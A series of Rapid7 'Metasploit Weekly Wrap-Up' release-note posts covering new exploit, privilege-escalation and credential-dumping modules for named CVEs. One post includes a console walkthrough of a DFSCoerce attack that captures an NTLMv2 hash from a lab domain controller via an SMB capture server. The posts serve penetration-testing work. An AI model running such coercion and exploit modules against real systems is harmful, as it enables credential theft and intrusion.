All posts by Dean Welch

Metasploit Weekly Wrap-Up

Post Syndicated from Dean Welch original https://blog.rapid7.com/2023/11/03/metasploit-weekly-wrap-up-34/

PTT for DCSync

Metasploit Weekly Wrap-Up

This week, community member smashery made an improvement to the windows_secrets_dump module to enable it to dump domain hashes using the DCSync method after having authenticated with a Kerberos ticket. Now, if a user has a valid Kerberos ticket for a privileged account, they can run the windows_secrets_dump module with the DOMAIN action and obtain the desired information. No password required. This is particularly useful in workflows involving the exploitation of AD/CS, using the ESC family of techniques.

New module content (2)

Citrix ADC (NetScaler) Bleed Scanner

Authors: Dylan Pindur and Spencer McIntyre
Type: Auxiliary
Pull request: #18492 contributed by zeroSteiner
Path: scanner/http/citrix_bleed_cve_2023_4966

Description: This adds a scanner module for exploiting CVE-2023-4966 which is a memory leak in Citrix ADC servers. This vulnerability allows a remote, unauthenticated attacker to leak memory by sending a very large HTTP Host header. The leaked memory is then scanned for session cookies which can be hijacked if found.

F5 BIG-IP TMUI AJP Smuggling RCE

Authors: Michael Weber, Sandeep Singh, Spencer McIntyre, and Thomas Hendrickson
Type: Exploit
Pull request: #18497 contributed by zeroSteiner
Path: linux/http/f5_bigip_tmui_rce_cve_2023_46747

Description: This module exploits a flaw in F5s BIG-IP Traffic Management User Interface (TMUI) that enables an external, unauthenticated attacker to create an administrative user. The attacker can then use the admin user to execute arbitrary code in the context of the root user.

Enhancements and features (3)

  • #18386 from e-lliot – :
    This adds the lmkdir command to Meterpreter, which creates a directory on the local host.
  • #18441 from sjanusz-r7 – Adds at rest encryption to Meterpreter payloads on the Metasploit host machine’s file system.
  • #18419 from smashery – This updates the windows_secrets_dump module’s DCSync technique (the DOMAIN action) to use Kerberos tickets for authentication. Users can now use Kerberos tickets for authentication with all actions in the module.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Dean Welch original https://blog.rapid7.com/2023/07/07/metasploit-weekly-wrap-up-18/

Apache RocketMQ

Metasploit Weekly Wrap-Up

We saw some great teamwork this week from jheysel-r7 and h00die to bring you an exploit module for CVE-2023-33246.
In Apache RocketMQ version 5.1.0 and under, there is an access control issue which the module leverages to update the broker’s configuration file without authentication. From here we can gain remote code execution as whichever user is running the service.

New module content (1)

Apache RocketMQ update config RCE

Authors: Malayke, h00die, and jheysel-r7
Type: Exploit
Pull request: #18082 contributed by jheysel-r7
AttackerKB reference: CVE-2023-33246

Description: This adds an exploit module that leverages an RCE in Apache RocketMQ. Due to an access control issue, one can update the Broker’s configuration file without authentication and obtain remote code execution in the context of the user running Apache RocketMQ. This vulnerability is identified as CVE-2023-33246.

Enhancements and features (4)

  • #18122 from h00die – This adds a library that provides methods for working with Apache RocketMQ.
  • #18144 from rorymckinley – Updates the capture plugin to be more helpful, and adds additional documentation. This passive capture plugin can be used with load capture and run with captureg --help.
  • #18147 from adfoster-r7 – Adds support for Ruby 3.3.0-preview1.
  • #18153 from adfoster-r7 – Removes Ruby 2.7 from Metasploit’s automated test suite. Ruby 2.7 has been officially marked as end-of-life by the maintainers. Users are recommended to upgrade to Ruby 3.x with a Ruby version manager or similar.

Bugs fixed (2)

  • #18152 from adfoster-r7 – This fixes a bug where the PHP Meterpreter would show the incorrect file size for very large files.
  • #18166 from dwelch-r7 – Fixes a crash when running the show payloads command for a module that supports encrypted payloads on a machine that doesn’t have a Mingw compiler available.

Documentation added (1)

  • #18169 from adfoster-r7 – Additional documentation has been added to the Metasploit Wiki to explain how plugins work.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Dean Welch original https://blog.rapid7.com/2023/04/21/metasploit-weekly-wrap-up-7/

VMware Workspace ONE Access exploit chain

Metasploit Weekly Wrap-Up

A new module contributed by jheysel-r7 exploits two vulnerabilities in VMware Workspace ONE Access to attain Remote Code Execution as the horizon user.
First being CVE-2022-22956, which is an authentication bypass and the second being a JDBC injection in the form of CVE-2022-22957 ultimately granting us RCE.
The module will seamlessly chain these two vulnerabilities together, simplifying the whole process.

More speeeeeeed!

Our own adfoster-r7 has added caching to Ruby’s loadpath logic with the help of bootsnap to improve the bootup performance of Metasploit.
On the hardware we tested we were getting an average of 2-3 seconds reduced time to boot which is a really nice quality of life improvement.

New module content (3)

VMware Workspace ONE Access VMSA-2022-0011 exploit chain

Authors: jheysel-r7 and mr_me
Type: Exploit
Pull request: #17854 contributed by jheysel-r7
AttackerKB reference: CVE-2022-22957, CVE-2022-22956

Description: This PR adds an exploit chaining CVE-2022-22956 and CVE-2022-22957 to gain code execution as the horizon user on VMWare Workspace One Access. The first vulnerability, CVE-2022-22956, is an authentication bypass in OAuth2TokenResourceController ACS which allows a remote, unauthenticated attacker to bypass the authentication mechanism and execute any operation. The second vulnerability, CVE-2022-22957, is a JDBC injection RCE specifically in the DBConnectionCheckController class’s dbCheck method which allows an attacker to deserialize arbitrary Java objects which can allow remote code execution.

VMware Workspace ONE Access CVE-2022-22960

Authors: jheysel-r7 and mr_me
Type: Exploit
Pull request: #17874 contributed by jheysel-r7
AttackerKB reference: CVE-2022-22960

Description: This PR adds an exploit module targeting CVE-2022-22960, which allows the user to overwrite the permissions of the certproxyService.sh script so that it can be modified by the horizon user. This allows a local attacker with the uid 1001 to escalate their privileges to root access.

SPIP form PHP Injection

Authors: Julien Voisin, Laluka, and coiffeur
Type: Exploit
Pull request: #17711 contributed by jvoisin
AttackerKB reference: CVE-2023-27372

Description: This module exploits a PHP code injection in SPIP. The vulnerability exists in the oubli parameter and allows an unauthenticated user to execute arbitrary commands with web user privileges.

Enhancements and features (4)

  • #17809 from adfoster-r7 – Adds caching to Ruby’s load path logic to improve the bootup performance of msfconsole on startup, averaging 2-3 seconds faster boot time on the tested hardware.
  • #17820 from manishkumarr1017 – This PR fixes the Nagios XI authenticated modules to work with even when autocheck is disabled as well as refactors reusable code.
  • #17884 from adfoster-r7 – Adds database migration validation before attempting to run the test suite. Users who have not migrated their local test database will be notified of the steps required to resolve this issue.
  • #17892 from h00die – Adds additional documentation for the exploit/windows/misc/unified_remote_rce module.

Bugs fixed (7)

  • #17873 from zgoldman-r7 – Updates the scanner/ftp/ftp_login module to ensure that opened connections are correctly closed after attempting to log in. Additionally, this fixes a bug where the FTPTimeout option was being ignored after being set by a user.
  • #17882 from zeroSteiner – A bug has been fixed in the getsystem command where getsystem techniques 5 and 6 were crashing sessions on Windows 11 22H2. Additionally, Python Windows Meterpreter payloads have been updated to include memory lock/unlock abilities.
  • #17883 from adfoster-r7 – Fixes a crash when running the modules/auxiliary/scanner/lotus/lotus_domino_hashes module and the database is not active.
  • #17888 from bcoles – Fixes a crash when running the help setg command in msfconsole.
  • #17893 from h00die – Updates the documentation for the modules/exploit/linux/local/asan_suid_executable_priv_esc module to be in the correct location.
  • #17907 from jheysel-r7 – Fixes a crash when running the exploits/linux/http/vmware_workspace_one_access_vmsa_2022_0011_chain.rb module.
  • #17909 from adfoster-r7 – Fixes a Windows7 Meterpreter crash when in debug mode.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Dean Welch original https://blog.rapid7.com/2023/02/03/metasploit-weekly-wrap-up-191/

Metasploit 6.3 is out!

Metasploit Weekly Wrap-Up

Earlier this week we announced the release of Metasploit 6.3 which came with a tonne of new modules and improvements.
The whole team worked super hard on this and we’re very excited that everyone can now get their hands on it and all of the new features it has to offer!
I won’t go over everything we did here because we have a whole separate blog post dedicated to the 6.3 release that you should check out if you missed it.

Dirty Cow available on macOS

We have a new module provided by timwr to exploit Dirty Cow on macOS. This module exploits a race condition in the kernel that gives the opportunity for a user to get code execution as root.

New module content (5)

CWP login.php Unauthenticated RCE

Authors: Numan Türle and Spencer McIntyre
Type: Exploit
Pull request: #17511 contributed by zeroSteiner
AttackerKB reference: CVE-2022-44877

Description: Adds an exploit for CVE-2022-44877 which is an unauthenticated command injection in CentOS Control Web Panel <0.9.8.1147. Successful exploitation results in code execution as the root user.

io_uring Same Type Object Reuse Priv Esc

Authors: Mathias Krause, Ryota Shiga, and h00die
Type: Exploit
Pull request: #17301 contributed by h00die
AttackerKB reference: CVE-2022-1043

Description: This module exploits Linux LPE CVE-2022-1043, a bug in io_uring leading to an additional put_cred() that can be exploited to hijack credentials of other processes.

vmwgfx Driver File Descriptor Handling Priv Esc

Authors: Mathias Krause and h00die
Type: Exploit
Pull request: #17300 contributed by h00die
AttackerKB reference: CVE-2022-22942

Description: This PR adds a linux privilege escalation against VMWare virtual machines with kernel 4.14-rc1 – 5.17-rc1 due to a VMWare driver bug.

macOS Dirty Cow Arbitrary File Write Local Privilege Escalation

Authors: Ian Beer, Zhuowei Zhang, and timwr
Type: Exploit
Pull request: #17415 contributed by timwr
AttackerKB reference: CVE-2022-46689

Description: This module is the macOS equivalent of the Dirty Cow vulnerability and allows for an unprivileged user to execute code as root.

Veeam Backup and Replication Credentials Dump

Author: npm
Type: Post
Pull request: #17406 contributed by npm-cesium137-io

Description: Post credential capture module Veeam Backup & Recovery and Veeam ONE Monitor versions 9.x – 11.x.

Enhancements and features (11)

  • #16946 from cgranleese-r7 – Updates the show targets and show actions command to display a visual indicator beside the currently selected value.
  • #17481 from h00die – An update has been made to the modules/auxiliary/scanner/http/options.rb module to modernize a few of its options, tidy up the code, and to handle an edge case when a target server might respond with a Tomcat error page.
  • #17504 from ErikWynter – Two aliases for show favorites have been added, namely favorite -l and favorites, to allow for easier listing of modules that users have marked as their favorites.
  • #17559 from cgranleese-r7 – Adds support for Ruby 3.2
  • #17560 from adfoster-r7 – Updates the Kerberos inspect_ticket module to show unsupported pac buffer ul_types in a clearer way to the user.
  • #17563 from bcoles – Improves documentation and code quality for modules/exploits/multi/local.
  • #17564 from serializingme – Improves the CIPCTlv definition for the exploits/windows/local/anyconnect_lpe module.
  • #17570 from zeroSteiner – The list of default queries used by the ldap_query module has been updated to add in the ENUM_DOMAIN and ENUM_MACHINE_ACCOUNT_QUOTA queries and to make some small updates to existing queries.
  • #17575 from zeroSteiner – Updates the Kerberos ccache functionality to automatically perform sname switching on Service Tickets when the ticket sname does not match the Metasploit module’s required sname. This allows for a service ticket associated with the SPN service_a/host.domain.local to be used and updated to service_b/host.domain.local dynamically as part of service authentication.
  • #17577 from bcoles – Updates modules/exploits/qnx to run the check command before attempting to exploit the target.
  • #17581 from bcoles – This PR modifies the conditions in 45 local privilege escalation modules to check whether the operator set ForceExploit to true before checking the permissions required for exploitation on the remote target, which is more efficient and quieter over the network.

Bugs fixed (4)

  • #17444 from hamax97 – A bug has been fixed whereby issuing a command line argument that contained nested equals signs would not be parsed correctly, and would instead be treated as two separate command line statements.
  • #17557 from zeroSteiner – This fixes the logon timestamp in the MS14-068 exploit so the generated ticket works.
  • #17558 from cgranleese-r7 – Fixes running msfconsole’s analyze command crashing when a WinRM session was opened.
  • #17561 from gwillcox-r7 – This fixes the direction for some Railgun function definitions in iphlpapi.

Documentation added (1)

  • #17565 from adfoster-r7 – Updates the docs site to add color to Metasploit console examples.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Dean Welch original https://blog.rapid7.com/2022/09/30/metasploit-weekly-wrap-up-178/

Veritas Backup Exec Agent RCE

Metasploit Weekly Wrap-Up

This module kindly provided by c0rs targets the Veritas Backup Exec Agent in order to gain RCE as the system/root user.
The exploit itself is actually a chain of 3 separate CVEs (CVE-2021-27876, CVE-2021-27877 and CVE-2021-27878) which only makes it more impressive.
While you’re patching, why not take the time to test your backups too.

Hikvision IP Camera user impersonation

This vulnerability has been present in Hikvision products since 2014 and comes to us courtesy of h00die-gr3y.
The main culprit here is in Hikvisions authentication mechanism which allows you to login as any valid user using only their username and from that point this module allows you to set a new password for your chosen username so now you can log in "legitimately".

New module content (6)

  • Hikvision IP Camera Unauthenticated Password Change Via Improper Authentication Logic by Monte Crypto and h00die-gr3y, which exploits CVE-2017-7921 – A new module has been added in for CVE-2017-7921, an improper authentication logic bug in HikVision cameras. Successfully exploiting this vulnerability allows unauthenticated attackers to impersonate any valid user on the affected camera, which can be used to gain full control over the camera.
  • Netfilter nft_set_elem_init Heap Overflow Privilege Escalation by Arthur Mongodin and Redouane NIBOUCHA, which exploits CVE-2022-34918 – This is a local-privilege escalation exploit targeting CVE-2022-34918, a vulnerability in the Netfilter component of the Linux kernel.
  • qdPM 9.1 Authenticated Arbitrary PHP File Upload (RCE) by Giacomo Casoni, Leon Trappett (thepcn3rd), and Rishal Dwivedi (Loginsoft), which exploits CVE-2020-7246 – Adds an exploit that targets an authenticated arbitrary file upload vulnerability to gain code execution on qdPM 9.1 and lower.
  • Veritas Backup Exec Agent Remote Code Execution by Alexander Korotin, which exploits CVE-2021-27878 – This module exploits a chain of the vulnerabilities CVE-2021-27876, CVE-2021-27877, and CVE-2021-27878 in Veritas Backup Exec Agent which leads to remote code execution with privileges of system or root user.
  • Mobile Mouse RCE by CHOKRI HAMMEDI and h00die – This PR includes a module that uses default configuration in Unified Remote to spawn a run prompt and return a shell.
  • Wifi Mouse RCE by H4RK3NZ0, REDHATAUGUST, and h00die, which exploits CVE-2022-3218 – A new module has been added for CVE-2022-3218, an unpatched (at the time of publication) authentication bypass in WiFi Mouse (Mouse Server) from Necta LLC which can be used to gain RCE as the user running Wifi Mouse (Mouse Server).

Enhancements and features (2)

  • #16981 from bcoles – This PR fixes several bugs as well as style and documentation inconsistencies as well as implementing new library methods.
  • #17048 from bcoles – :
    This PR Updates the enum_token module by adding documentation, clarifying the description, improving efficiency, and leveraging library code.

Bugs fixed (3)

  • #16994 from zeroSteiner – Fixes multiple issues with registry manipulation on opened sessions.
  • #17054 from zeroSteiner – Fixes a crash when using the info and generate commands for adapted single (unstaged) payloads – such as cmd/windows/powershell/meterpreter/reverse_tcp.
  • #17073 from cgranleese-r7 – Fixes a bug where sessions opened by running one of the rexec_login / rlogin_login / rsh_login modules would die after module completion.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Dean Welch original https://blog.rapid7.com/2022/07/08/metasploit-weekly-wrap-up-165/

DFSCoerce – Distributing more than just files

Metasploit Weekly Wrap-Up

DFS (Distributed File System) is now distributing Net-NTLM credentials thanks to Spencer McIntyre with a new auxiliary/scanner/dcerpc/dfscoerce module that is similar to PetitPotam in how it functions. Note that unlike PetitPotam, this technique does require a normal domain user’s credentials to work.

The following shows the workflow for targeting a 64-bit Windows Server 2019 domain controller. Metasploit is hosting an SMB capture server to log the incoming credentials from the target machine account:

msf6 > use auxiliary/server/capture/smb 
msf6 auxiliary(server/capture/smb) > run
[*] Auxiliary module running as background job 0.
msf6 auxiliary(server/capture/smb) > 
[*] Server is running. Listening on 0.0.0.0:445
[*] Server started.
msf6 auxiliary(server/capture/smb) > use auxiliary/scanner/dcerpc/dfscoerce 
msf6 auxiliary(scanner/dcerpc/dfscoerce) > set RHOSTS 192.168.159.96
RHOSTS => 192.168.159.96
msf6 auxiliary(scanner/dcerpc/dfscoerce) > set VERBOSE true
VERBOSE => true
msf6 auxiliary(scanner/dcerpc/dfscoerce) > set SMBUser aliddle
SMBUser => aliddle
msf6 auxiliary(scanner/dcerpc/dfscoerce) > set SMBPass Password1
SMBPass => Password1
msf6 auxiliary(scanner/dcerpc/dfscoerce) > run
[*] 192.168.159.96:445    - Connecting to Distributed File System (DFS) Namespace Management Protocol
[*] 192.168.159.96:445    - Binding to \netdfs...
[+] 192.168.159.96:445    - Bound to \netdfs
[+] Received SMB connection on Auth Capture Server!
[SMB] NTLMv2-SSP Client     : 192.168.250.237
[SMB] NTLMv2-SSP Username   : MSFLAB\WIN-3MSP8K2LCGC$
[SMB] NTLMv2-SSP Hash       : WIN-3MSP8K2LCGC$::MSFLAB:971293df35be0d1c:804d2d329912e92a442698d0c6c94f08:01010000000000000088afa3c78cd801bc3c7ed684c95125000000000200120057004f0052004b00470052004f00550050000100120057004f0052004b00470052004f00550050000400120057004f0052004b00470052004f00550050000300120057004f0052004b00470052004f0055005000070008000088afa3c78cd80106000400020000000800300030000000000000000000000000400000f0ba0ee40cb1f6efed7ad8606610712042fbfffb837f66d85a2dfc3aa03019b00a001000000000000000000000000000000000000900280063006900660073002f003100390032002e003100360038002e003200350030002e003100330034000000000000000000
[+] 192.168.159.96:445    - Server responded with ERROR_ACCESS_DENIED which indicates that the attack was successful
[*] 192.168.159.96:445    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/dcerpc/dfscoerce) >

FreeSwitch Brute Force Login

A returning contributor krastanoel has brought us a module for brute forcing the login credential for the FreeSWITCH event socket service.
This is even simpler to use than our usual login scanner modules since there’s no need to determine or brute force a username — only the password is required!

New module content (2)

  • DFSCoerce by Spencer McIntyre, Wh04m1001, and xct_de – This adds a scanner module that implements the dfscoerce technique. Although this technique leverages MS-DFSNM methods, this module works similarly to PetitPotam in that it coerces authentication attempts to other machines over SMB. This ability to coerce authentication attempts makes it particularly useful in NTLM relay attacks.
  • FreeSWITCH Event Socket Login by krastanoel – This adds an auxiliary scanner module that brute forces the FreeSwitch’s event socket service login interface to guess the password.

Enhancements and features (1)

  • #16716 from bcoles – This updates HTTP Command stagers to expose the CMDSTAGER::URIPATH option, so users can choose where to host the payload when using a command stager.

Bugs fixed (3)

  • #16704 from gwillcox-r7 – This fixes an issue when targeting some faulty memcached servers that return an error when extracting the keys and values stored in slabs. The module no longer errors out with a type conversion error.
  • #16724 from bcoles – This updates and fixes the exploit/windows/iis/ms01_026_dbldecode module. It now uses the standard HttpClient, the TFTP stager has been fixed, and Meterpreter specific code has been removed since Meterpreter is not available on Server 2000 systems since Metasploit v6.
  • #16731 from space-r7 – Fixes a logic bug in the process API that would cause additional permissions to be requested than what was intended.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Dean Welch original https://blog.rapid7.com/2022/04/22/https-www-rapid7-com-blog-post-2022-04-01-metasploit-weekly-wrap-up-158/

ManageEngine ADSelfService Plus Authenticated RCE

Metasploit Weekly Wrap-Up

This module is pretty exciting for us because it’s for a vulnerability discovered by our very own Rapid7 researchers Jake Baines, Hernan Diaz, Andrew Iwamaye, and Dan Kelly.
The vulnerability allowed for attackers to leverage the "custom script" functionality to execute arbitrary operating system commands whenever domain users reset their passwords.
I won’t go into too much depth though because we have a whole blog post here for you to check out with all the details!
Oh, and I almost forgot to mention this module comes with a brand new jjs_reverse_tcp payload too.

Who watches the watch_queue?

This week we’ve also brought you an LPE for Linux via the watch_queue event notification system.
The module exploits a heap out-of-bounds write in kernel memory in versions prior to 5.18 but keep in mind the module currently only has the appropriate offsets for Ubuntu 20.10 with kernel version 5.13.0-37.

New module content (2)

Enhancements and features (6)

  • #16437 from h00die – Adds ESXi as a recognizable type on ssh_login.
  • #16438 from h00die – Some SMTP servers only give out credentials when prompted. Now, the module option ‘AUTHPROMPT’ exists to indicate whether or not the auth prompt is required by the server.
  • #16446 from zeroSteiner – This updates the code for compatibility with the latest RubySMB 3.1 gem.
  • #16458 from bcoles – The fortios_vpnssl_traversal_creds_leak module has been updated to appropriately attribute the original discoverers of the vulnerability and to credit their original blog post and research presentations.
  • #16476 from bcoles – The tools/dev/msftidy.rb tool has been updated to recommend using CVE datastore references over the cve.mitre.org URL references since this is more maintainable in the long run and will assist transitioning things when CVE transitions to cve.org later this year.
  • #16477 from bcoles – This PR updates several modules to remove hardcoded URL references to the soon to be deprecated cve.mitre.org site, and where applicable, add in CVE references in place of these hardcoded URL references.

Bugs fixed (5)

  • #16318 from heyder – Adds support to old key exchange algorithms in the net/ssh lib by defining the append_all_supported_algorithms to true.
  • #16379 from heyder – Refactored a number of modules to use ssh_client_defaults.
  • #16426 from usiegl00 – This fixes a crash in OSX Meterpreter’s stager caused by mangled dyld functions in MacOS Monterey.
  • #16457 from jmartin-r7 – Recent updates in Rex::Parser::Arguments regressed the ability to have short flags with multiple characters. This restores functionality by updating the spec checks and library code to appropriately parse multiple character short flags and each individual short flag specified in a combined short flag.
  • #16479 from cdelafuente-r7 – Meterpreter’s reg setval command has been updated to allow setting a REG_BINARY key value with the -d option with an arbitrarily long binary blob. Previously, this value was treated as a string which lead to an incorrect value being set in the registry field.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit weekly wrap-up

Post Syndicated from Dean Welch original https://blog.rapid7.com/2022/01/28/metasploit-wrap-up-146/

I’m sure you know what’s coming, more Log4Shell

Metasploit weekly wrap-up

For those wondering when the Log4Shell remediation nightmare will end, I’m afraid I can’t give you that. What I can give you, though, is a new Log4Shell module! With the new module from zeroSteiner you can expect to get unauthenticated RCE on the Ubiquiti UniFi Controller Application via a POST request to the /api/login page. Be sure to leverage the module’s check function since scanners detecting header injection may not work.

A new getsystem technique for Meterpreter

smashery has done an amazing job working on giving us a fifth getsystem technique on the Windows Meterpreter. This newest addition ports Clément Labro’s PrintSpoofer technique to Metasploit. It gains SYSTEM privileges from the LOCAL SERVICE and NETWORK SERVICE accounts by abusing the SeImpersonatePrivilege privilege. Like the other getsystem techniques, this attack takes place entirely in memory without any additional configuration on both 32-bit and 64-bit versions of Windows. It has been tested successfully on Windows 8.1 / Server 2016 and later. Unlike some of the other getsystem technqiues this one also has the advantage of not starting services which is often an action that is identified as malicious. Users can run this elevation technique directory by using the getsystem -t 5 command in Meterpreter. Now exploits that yield sessions LOCAL SERVICE and NETWORK SERVICE permissions can easily be upgraded to full SYSTEM level privileges.

New module content (2)

  • Grandstream UCM62xx IP PBX sendPasswordEmail RCE by jbaines-r7, which exploits CVE-2020-5722 – A new exploit module for CVE-2020-5722 has been added which exploits an unauthenticated SQL injection vulnerability and a command injection vulnerability affecting the Grandstream UCM62xx IP PBX series of devices to go from an unauthenticated remote user to root level code execution.
  • UniFi Network Application Unauthenticated JNDI Injection RCE (via Log4Shell) by Nicholas Anastasi, RageLtMan, and Spencer McIntyre, which exploits CVE-2021-44228 – A module has been added to exploit CVE-2021-44228, an unauthenticated RCE in the Ubiquiti Unifi controller application versions 5.13.29 through 6.5.53 in the remember field of a POST request to the /api/login page. Successful exploitation results in OS command execution in the context of the server application.

Enhancements and features

  • #15904 from smashery – This PR adds the logic to support a fifth getsystem option using SeImpersonatePrivilege to gain SYSTEM privileges using the Print Spooler primitive on Windows. It is the Framework side of https://github.com/rapid7/metasploit-payloads/pull/509.
  • #16020 from VanSnitza – The exploit/scanner/auxiliary/scada/modbusclient module has been enhanced to support command 0x2B which gives clear text info about a device. Additionally the module’s code has been updated to comply with RuboCop standards.
  • #16090 from audibleblink – A new method user_data_directory has been added to lib/msf/base/config.rb to allow users that use private Metasploit modules to keep module resources organized in the same way that MSF does for core modules, all whilst keeping their ~/.msf4 directory portable between installs.
  • #16096 from zeroSteiner – The implementation of the ReverseListenerComm and ListenerComm datastore options have now been updated to support specifying -1 to refer to the most recently created session without having to either remember what it was or change it when a new session is created.
  • #16106 from bwatters-r7 – This PR updates the stdapi_fs_delete_dir command to recursively delete the directory. Previously, we discovered some inconsistencies in the handling of directory deletion across Meterpreter payloads, and this implements a fix in the Linux Meterpreter to support recursive deletion of directories, even if they contain files, matching implementations in other Meterpreter types.

Bugs fixed

  • #16054 from namaenonaimumei – This PR updates John the Ripper (JTR) compatibility by altering the flag used to prevent logging.
  • #16104 from zeroSteiner – Fixes a crash in the portfwd command which occurred when pivoting a reverse_http Python Meterpreter through a reverse_tcp Windows Meterpreter

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Wrap-Up

Post Syndicated from Dean Welch original https://blog.rapid7.com/2021/10/22/metasploit-wrap-up-135/

We just couldn’t contain ourselves!

Metasploit Wrap-Up

This week we’ve got two Kubernetes modules coming at you from adfoster-r7 and smcintyre-r7. First up is an enum module auxiliary/cloud/kubernetes/enum_kubernetes that’ll extract a variety of information including the namespaces, pods, secrets, service token information, and the Kubernetes environment version! Next is an authenticated code execution module exploit/multi/kubernetes/exec (which shipped with a new websocket implementation, too, by the way) that will spin up a new pod with a Meterpreter payload for you provided you have the Kubernetes JWT token and access to the Kubernetes REST API. These modules can even be run through a compromised container that may be running on the Kubernetes cluster.

Atlassian Confluence WebWork OGNL Injection gets Windows support

You might remember Confluence Server CVE-2021-26084 making an appearance in a wrap-up last month, and it’s back! Rapid7’s own wvu-r7 has updated his Confluence Server exploit to support Windows targets.

New module content (2)

  • Kubernetes Enumeration by Spencer McIntyre and Alan Foster – This adds a module for enumerating Kubernetes environments. It can be run via an established session within a Kubernetes environment or with an authentication token and target information. It will extract a variety of information including the namespaces, pods, secrets and version.
  • Kubernetes authenticated code execution by Spencer McIntyre and Alan Foster – Adds a new exploit/multi/kubernetes/exec module. It can be run via an established session within a Kubernetes environment or with an authentication token and target information. The module creates a new pod which will execute a Meterpreter payload to open a new session, as well as mounting the host’s file system when possible.

Enhancements and features

  • #15732 from dwelch-r7 – Adds terminal size synchronisation for fully interactive shells against Linux environments with shell -it. This functionality is behind a feature flag and can be enabled with features set fully_interactive_shells true.
  • #15769 from wvu-r7 – Added Windows support to the Atlassian Confluence CVE-2021-26084 exploit.
  • #15773 from adfoster-r7 – Adds a collection of useful commands for configuring a local or remote Kubernetes environment to aid with testing and exploring Metasploit’s Kubernetes modules and pivoting capabilities. The resource files include deploying two vulnerable applications, and populating secrets which can be extracted and stored as loot, as well as utility commands for creating admin and service account tokens.

Bugs fixed

  • #15760 from adfoster-r7 – Fixes an issue when attempting to store JSON loot, where the extension was always being set to bin instead of json.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Wrap-Up

Post Syndicated from Dean Welch original https://blog.rapid7.com/2021/01/22/metasploit-wrap-up-95/

Metasploit Wrap-Up

Metasploit Wrapup

Windows print spooler vulnerability…again

Here we have bwatters-r7 coming in with an exploit for CVE-2020-1337, a patch bypass for a Windows print spooler elevation of privilege vulnerability that was exploited in the wild last year. The original vulnerability, CVE-2020-1048, garnered quite a bit of interest from the security community, in large part because the Windows print spooler is a legacy component that was abused as part of the Stuxnet attack. Alex Ionescu and Yarden Shafir, the researchers who discovered CVE-2020-1048, have a great write-up here if you’re looking for a deep dive.

The first patch that Microsoft released for CVE-2020-1048 uses a check to verify that the process creating a printer port targeting a location has privileges to write to that location. Unfortunately, that patch only checks the permissions when the port is created. The bypass utilized here simply creates the port pointing to a location the user can write
to. Then, after the printer port is created, it creates a symlink from
the location pointed to by the printer port to a second location. The check will pass because the link is only created after the check, but the link will be in place when the print takes place, so the file write will pass through and end up in the trusted location.

A very prompt fix

Chiggins gave us a fix for the msfconsole prompt with PR #14635. For those not in the know, you can set your prompt in the console with the set Prompt command. Thanks to Chiggins setting your prompt to the timestamp works again! So feel free to give it a go with set Prompt %T.

New Modules (1)

Enhancements and features

  • #14583 from dwelch-r7 This PR adds in the ability for framework to detect when a given nmap scan requires sudo privileges and re-runs nmap with sudo prompting the user in the typical way
  • #14621 from geyslan This PR reduces the size of the linux/x64/shell_bind_tcp_random_port payload and maintains the functionality.
  • #14630 from h00die Adds the hardcoded creds found in Zyxel devices to the unix creds files – as captured within CVE-2020-29583

Bugs Fixed

  • #14597 from arno01 Updates the modules/auxiliary/gather/external_ip.rb module to provide a valid default vhost setting
  • #14609 from dwelch-r7 A bug was fixed in the lib/msf/core/exploit/remote/http_client.rb and lib/msf/core/opt_http_rhost_url.rb libraries whereby if a user used a /etc/hosts entry for resolving a hostname to an IP address, the VHOST datastore variable would be set incorrectly. This has now been resolved by improving the logic of these two libraries and updating the spec checks accordingly.
